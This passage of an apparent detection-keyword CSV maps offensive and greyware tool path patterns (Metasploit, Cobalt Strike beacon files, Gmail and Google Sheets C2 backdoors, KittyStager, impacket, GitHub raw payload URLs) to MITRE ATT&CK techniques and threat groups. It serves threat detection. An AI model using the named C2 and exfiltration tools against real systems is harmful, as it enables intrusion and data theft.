exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/gather/forensics*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/gato/*attack.py*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,1,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*/GC2-sheet/*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*/gcat.git*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,1,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*/gcat.py,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,1,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*/geacon/*beacon*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*/geacon_pro*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*/Gemail-Hack.git*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/Ha3MrX/Gemail-Hack,1,1,N/A,7,9,813,385,2022-02-18T16:12:45Z,2018-04-19T13:48:41Z -*/GetBrowsers.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/get-clipboard.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/getLegit/cdnl*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/getLegit/grkg*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/getLegit/prvw*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/getLegit/qhwl*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/getLegit/tsom*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/getLegit/zijz*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/get-loggedon/*.c*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/get-shucking.php*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*/getST.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/get-system/getsystem.c*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/GetWebDAVStatus_BOF/*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*/ghidra*,offensive_tool_keyword,ghidra,Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.,T1057 - T1053 - T1564 - T1204 - T1083,TA0002 - TA0011 - TA0008,N/A,N/A,Frameworks,https://github.com/NationalSecurityAgency/ghidra,1,0,N/A,N/A,10,43232,5251,2023-10-01T16:10:19Z,2019-03-01T03:27:48Z -*/ghostfile.aspx*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*/GhostInTheNet.git*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,1,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*/GhostInTheNet.sh*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,1,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*/GhostInTheNet-master*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,1,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*/ghostscript/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/gimmeSH.sh*,offensive_tool_keyword,gimmeSH,gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.,T1059 T1505,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/A3h1nt/gimmeSH,1,1,N/A,N/A,2,168,27,2021-08-27T03:12:15Z,2021-08-02T07:22:15Z -*/giop-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com*.exe?raw=true*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/archive/refs/tags/*.zip*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.7z*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.apk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.app*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.as*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.asc*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.asp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.bash*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.bat*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.beacon*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.bin*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.bpl*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.c*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.cer*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.cmd*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.com*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.cpp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.crt*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.cs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.csh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.dat*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.dll*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.docm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.dos*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.exe*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.go*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.gz*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.hta*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.iso*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.jar*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.js*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.lnk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.log*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.mac*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.mam*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.msi*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.msp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.nexe*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.nim*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.otm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.out*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.ova*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pem*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pfx*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A 